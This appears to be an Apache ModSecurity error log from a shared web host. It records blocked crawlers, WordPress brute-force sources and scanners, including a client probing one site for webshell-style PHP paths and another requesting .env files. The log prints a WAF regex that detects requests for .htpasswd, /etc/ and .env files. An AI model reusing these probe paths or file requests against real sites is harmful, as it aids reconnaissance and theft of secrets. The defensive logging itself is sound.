[Tue May 26 20:02:32.889784 2026] [security2:error] [pid 106517:tid 106772] [client 114.119.159.33:63303] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.bloggertarget.com"] [uri "/top-50-best-free-rss-feed-submission-site-list-for-seo"] [unique_id "ahWvAIZZc2DoU1lPnP14hAAAAP4"], referer: https://www.bloggertarget.com/tag/submit-a-guest-post
[Tue May 26 20:02:33.167221 2026] [security2:error] [pid 106517:tid 106715] [client 103.163.220.21:38797] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-content/themes/twentynineteen/sass/site/header/"] [unique_id "ahWvAYZZc2DoU1lPnP14jgAAAMU"]
[Tue May 26 20:02:33.419996 2026] [security2:error] [pid 106517:tid 106608] [remote 78.142.18.172:38662] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 172.18.142.78.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "bosscoirs.com"] [uri "/wp-login.php"] [unique_id "ahWvAYZZc2DoU1lPnP14kQAAy1g"], referer: https://bosscoirs.com/wp-login.php
[Tue May 26 20:02:33.678734 2026] [security2:error] [pid 106517:tid 106691] [client 103.163.220.47:25889] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-admin/includes/media-time.php"] [unique_id "ahWvAYZZc2DoU1lPnP14mwAAAK0"]
[Tue May 26 20:02:34.273296 2026] [security2:error] [pid 106517:tid 106685] [client 103.163.220.52:21469] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-admin/veq/aaa.php"] [unique_id "ahWvAoZZc2DoU1lPnP14pgAAAKc"]
[Tue May 26 20:02:34.812498 2026] [security2:error] [pid 112029:tid 112079] [remote 153.127.19.115:33686] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 115.19.127.153.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWvAqFW0C-ajaCsyFdBQQABKzE"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 20:02:34.984614 2026] [security2:error] [pid 106517:tid 106660] [client 103.163.220.47:52755] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-includes/blocks/post-featured-image/"] [unique_id "ahWvAoZZc2DoU1lPnP14xQAAAI8"]
[Tue May 26 20:02:35.683559 2026] [security2:error] [pid 113091:tid 113335] [client 103.163.220.46:54555] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-content/themes/riode/inc/add-on/live-search/"] [unique_id "ahWvA6PxBGSmlFNOy6pG1QAAAoY"]
[Tue May 26 20:02:35.708705 2026] [security2:error] [pid 112029:tid 112210] [client 57.141.2.44:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWvA6FW0C-ajaCsyFdBRQAAAT0"]
[Tue May 26 20:02:36.162431 2026] [fcgid:warn] [pid 113091:tid 113265] (70014)End of file found: [client 199.45.154.122:59058] mod_fcgid: can't get data from http client
[Tue May 26 20:02:36.226282 2026] [security2:error] [pid 113091:tid 113326] [client 103.163.220.43:52751] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-content/themes/twentytwentyfive/assets/fonts/literata/"] [unique_id "ahWvBKPxBGSmlFNOy6pG4gAAAn0"]
[Tue May 26 20:02:36.447092 2026] [security2:error] [pid 112029:tid 112255] [client 141.11.62.234:40110] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "divinternationalcourier.in.onesoft.in"] [uri "/.env"] [unique_id "ahWvBKFW0C-ajaCsyFdBWAAAAWo"]
[Tue May 26 20:02:36.771422 2026] [security2:error] [pid 106517:tid 106737] [client 103.163.220.24:53063] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-includes/blocks/post-author-name/"] [unique_id "ahWvBIZZc2DoU1lPnP142gAAANs"]
[Tue May 26 20:02:37.271519 2026] [security2:error] [pid 113091:tid 113299] [client 103.163.220.40:25407] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-includes/blocks/term-description/"] [unique_id "ahWvBaPxBGSmlFNOy6pG9AAAAmI"]
[Tue May 26 20:02:37.768667 2026] [security2:error] [pid 113091:tid 113271] [client 103.163.220.51:33353] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-includes/blocks/shortcode/"] [unique_id "ahWvBaPxBGSmlFNOy6pHBwAAAkY"]
[Tue May 26 20:02:38.095036 2026] [security2:error] [pid 113091:tid 113343] [client 57.141.2.55:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWvBaPxBGSmlFNOy6pHAwAAAo4"]
[Tue May 26 20:02:38.261967 2026] [security2:error] [pid 112029:tid 112218] [client 103.163.220.16:29935] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-includes/blocks/math/"] [unique_id "ahWvBqFW0C-ajaCsyFdBbAAAAUU"]
[Tue May 26 20:02:38.564591 2026] [security2:error] [pid 106517:tid 106758] [client 141.11.62.234:42656] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "divinternationalcourier.in.onesoft.in"] [uri "/backend/.env"] [unique_id "ahWvBoZZc2DoU1lPnP14-gAAAPA"]
[Tue May 26 20:02:38.568453 2026] [security2:error] [pid 106517:tid 106771] [client 141.11.62.234:42622] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "divinternationalcourier.in.onesoft.in"] [uri "/api/.env"] [unique_id "ahWvBoZZc2DoU1lPnP14_QAAAP0"]
[Tue May 26 20:02:38.768154 2026] [security2:error] [pid 106517:tid 106663] [client 103.163.220.53:55789] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-includes/Requests/src/Utility/"] [unique_id "ahWvBoZZc2DoU1lPnP15BwAAAJI"]
[Tue May 26 20:02:39.211972 2026] [security2:error] [pid 106517:tid 106693] [client 162.243.41.33:61473] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "stvica.jhonweb.com"] [uri "/website/wp-includes/wlwmanifest.xml"] [unique_id "ahWvB4ZZc2DoU1lPnP15EQAAAK8"]
[Tue May 26 20:02:39.278031 2026] [security2:error] [pid 113091:tid 113293] [client 103.163.220.41:45985] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-includes/js/crop/index.php"] [unique_id "ahWvB6PxBGSmlFNOy6pHKQAAAlw"]
[Tue May 26 20:02:39.375953 2026] [security2:error] [pid 113091:tid 113300] [client 120.240.178.168:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahWvB6PxBGSmlFNOy6pHLQAAAmM"]
[Tue May 26 20:02:39.777000 2026] [security2:error] [pid 106517:tid 106754] [client 103.163.220.28:57191] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-includes/js/tinymce/skins/lightgray/"] [unique_id "ahWvB4ZZc2DoU1lPnP15IQAAAOw"]
[Tue May 26 20:02:40.271752 2026] [security2:error] [pid 106517:tid 106672] [client 103.163.220.54:58215] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-includes/abilities-api/wp-conflg.php"] [unique_id "ahWvCIZZc2DoU1lPnP15MgAAAJs"]
[Tue May 26 20:02:40.765077 2026] [security2:error] [pid 106517:tid 106708] [client 103.163.220.6:41059] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-content/plugins/class-wp-image.php"] [unique_id "ahWvCIZZc2DoU1lPnP15PgAAAL4"]
[Tue May 26 20:02:40.776795 2026] [security2:error] [pid 106517:tid 106741] [client 57.141.2.56:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWvCIZZc2DoU1lPnP15NQAAAN8"]
[Tue May 26 20:02:41.099797 2026] [security2:error] [pid 106517:tid 106568] [remote 217.112.89.35:59812] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 35.89.112.217.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "triviewsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWvCIZZc2DoU1lPnP15RgAA1DA"]
[Tue May 26 20:02:41.266039 2026] [security2:error] [pid 112029:tid 112164] [client 103.163.220.31:38571] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-includes/fonts/bott.php"] [unique_id "ahWvCaFW0C-ajaCsyFdBegAAAQ8"]
[Tue May 26 20:02:41.776314 2026] [security2:error] [pid 106517:tid 106697] [client 103.163.220.11:51497] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-admin/includes/admin.php"] [unique_id "ahWvCYZZc2DoU1lPnP15WgAAALM"]
[Tue May 26 20:02:42.268526 2026] [security2:error] [pid 106517:tid 106712] [client 103.163.220.45:63043] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-content/chosen.php"] [unique_id "ahWvCoZZc2DoU1lPnP15awAAAMI"]
[Tue May 26 20:02:42.400558 2026] [security2:error] [pid 106517:tid 106775] [client 162.243.41.33:61735] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "stvica.jhonweb.com"] [uri "/news/wp-includes/wlwmanifest.xml"] [unique_id "ahWvCoZZc2DoU1lPnP15dAAAAQE"]
[Tue May 26 20:02:42.710015 2026] [security2:error] [pid 113091:tid 113246] [client 57.141.2.52:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWvCqPxBGSmlFNOy6pHbgAAAi0"]
[Tue May 26 20:02:42.766499 2026] [security2:error] [pid 106517:tid 106675] [client 103.163.220.25:39657] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-admin/css/admin.php"] [unique_id "ahWvCoZZc2DoU1lPnP15dwAAAJ4"]
[Tue May 26 20:02:43.276175 2026] [security2:error] [pid 113091:tid 113318] [client 103.163.220.11:29577] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-content/zsdhb.php"] [unique_id "ahWvC6PxBGSmlFNOy6pHjAAAAnU"]
[Tue May 26 20:02:43.780229 2026] [security2:error] [pid 113091:tid 113276] [client 103.163.220.17:62291] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-admin/revision-long.php"] [unique_id "ahWvC6PxBGSmlFNOy6pHnwAAAks"]
[Tue May 26 20:02:44.127441 2026] [security2:error] [pid 113091:tid 113147] [remote 216.73.216.30:47387] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.216.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "billing.mosykay.com"] [uri "/"] [unique_id "ahWvDKPxBGSmlFNOy6pHpgACLjc"]
[Tue May 26 20:02:44.270869 2026] [security2:error] [pid 113091:tid 113301] [client 103.163.220.41:64265] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-includes/ID3/getid3-exception.php"] [unique_id "ahWvDKPxBGSmlFNOy6pHqQAAAmQ"]
[Tue May 26 20:02:44.777247 2026] [security2:error] [pid 113091:tid 113263] [client 103.163.220.6:61979] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-includes/class-json-restful.php"] [unique_id "ahWvDKPxBGSmlFNOy6pHuwAAAj4"]
[Tue May 26 20:02:45.168160 2026] [security2:error] [pid 112029:tid 112195] [client 57.141.2.18:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWvDKFW0C-ajaCsyFdBiAAAAS4"]
[Tue May 26 20:02:45.281611 2026] [security2:error] [pid 113091:tid 113256] [client 103.163.220.35:36233] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-admin/xml.php"] [unique_id "ahWvDaPxBGSmlFNOy6pHygAAAjc"]
[Tue May 26 20:02:45.744553 2026] [security2:error] [pid 106517:tid 106629] [remote 217.112.89.35:59812] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 35.89.112.217.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "triviewsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWvDYZZc2DoU1lPnP15rAAA4G0"], referer: https://triviewsolutions.com/wp-login.php
[Tue May 26 20:02:45.783943 2026] [security2:error] [pid 113091:tid 113305] [client 103.163.220.24:23963] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-admin/includes/revision-path.php"] [unique_id "ahWvDaPxBGSmlFNOy6pH1wAAAmg"]
[Tue May 26 20:02:46.290077 2026] [security2:error] [pid 112029:tid 112199] [client 103.163.220.53:42803] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-includes/images/media/build/irys/"] [unique_id "ahWvDqFW0C-ajaCsyFdBmwAAATI"]
[Tue May 26 20:02:48.081569 2026] [security2:error] [pid 113091:tid 113341] [client 103.163.220.25:31507] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-includes/blocks/details/xmu.php"] [unique_id "ahWvEKPxBGSmlFNOy6pIBwAAAow"]
[Tue May 26 20:02:48.522179 2026] [security2:error] [pid 106517:tid 106775] [client 57.141.2.61:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWvEIZZc2DoU1lPnP155wAAAQE"]
[Tue May 26 20:02:48.571813 2026] [security2:error] [pid 106517:tid 106694] [client 103.163.220.26:22319] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-admin/css/colors/modern/dist/resources/js/tal/admin.php"] [unique_id "ahWvEIZZc2DoU1lPnP15-QAAALA"]
[Tue May 26 20:02:49.068178 2026] [security2:error] [pid 106517:tid 106710] [client 103.163.220.9:50851] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-includes/l10n/build/dist/cache/cache/uploads/build/uco/"] [unique_id "ahWvEYZZc2DoU1lPnP16EQAAAMA"]
[Tue May 26 20:02:49.577149 2026] [security2:error] [pid 106517:tid 106761] [client 103.163.220.35:41415] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-includes/classwithtostring.php"] [unique_id "ahWvEYZZc2DoU1lPnP16IgAAAPM"]
[Tue May 26 20:02:49.595343 2026] [security2:error] [pid 113091:tid 113272] [client 194.26.192.219:60167] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 219.192.26.194.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "md-74.webhostbox.net"] [uri "/wp-content/themes/seotheme/db.php"] [unique_id "ahWvEaPxBGSmlFNOy6pIHwAAAkc"], referer: www.google.com
[Tue May 26 20:02:49.600552 2026] [security2:error] [pid 113091:tid 113257] [client 194.26.192.219:60149] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 219.192.26.194.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "md-74.webhostbox.net"] [uri "/wp-content/plugins/fix/up.php"] [unique_id "ahWvEaPxBGSmlFNOy6pIIAAAAjg"]
[Tue May 26 20:02:49.601665 2026] [security2:error] [pid 106517:tid 106749] [client 194.26.192.219:60150] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 219.192.26.194.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "md-74.webhostbox.net"] [uri "/wp-plain.php"] [unique_id "ahWvEYZZc2DoU1lPnP16IQAAAOc"], referer: www.google.com
[Tue May 26 20:02:49.763261 2026] [security2:error] [pid 113091:tid 113244] [client 194.26.192.219:52727] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 219.192.26.194.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "md-74.webhostbox.net"] [uri "/msanazfg.php"] [unique_id "ahWvEaPxBGSmlFNOy6pIJgAAAis"], referer: www.google.com
[Tue May 26 20:02:49.781250 2026] [security2:error] [pid 106517:tid 106669] [client 23.129.64.138:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "kingsclub.in"] [uri "/index.php"] [unique_id "ahWvEYZZc2DoU1lPnP16IwAAmH0"], referer: https://kingsclub.in/comments/feed
[Tue May 26 20:02:50.080000 2026] [security2:error] [pid 106517:tid 106736] [client 103.163.220.17:63123] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/images/chosen.php"] [unique_id "ahWvEoZZc2DoU1lPnP16MQAAANo"]
[Tue May 26 20:02:50.198016 2026] [security2:error] [pid 106517:tid 106652] [client 194.26.192.219:65434] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 219.192.26.194.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "md-74.webhostbox.net"] [uri "/wp-content/themes/seotheme/db.php"] [unique_id "ahWvEoZZc2DoU1lPnP16NAAAAIc"], referer: www.google.com
[Tue May 26 20:02:50.368467 2026] [security2:error] [pid 113091:tid 113338] [client 195.2.71.225:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWvEqPxBGSmlFNOy6pINgAAAok"], referer: http://anujtradingco.com/top-deejay-headphones/?unapproved=1203509&moderation-hash=30ff998383af377c781773c90331cda3
[Tue May 26 20:02:50.543307 2026] [security2:error] [pid 112029:tid 112175] [client 194.26.192.219:49456] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 219.192.26.194.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "md-74.webhostbox.net"] [uri "/wp-plain.php"] [unique_id "ahWvEqFW0C-ajaCsyFdBzwAAARo"], referer: www.google.com
[Tue May 26 20:02:50.580802 2026] [security2:error] [pid 106517:tid 106753] [client 103.163.220.54:23555] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-content/plugins/hlex/hlex2.php"] [unique_id "ahWvEoZZc2DoU1lPnP16QgAAAOs"]
[Tue May 26 20:02:50.966770 2026] [security2:error] [pid 112029:tid 112285] [client 57.141.2.34:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWvEqFW0C-ajaCsyFdBzgAAAYg"]
[Tue May 26 20:02:51.069778 2026] [security2:error] [pid 112029:tid 112255] [client 103.125.146.81:45683] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-content/plugins/view-source/ioxi-o2.php"] [unique_id "ahWvE6FW0C-ajaCsyFdB2wAAAWo"]
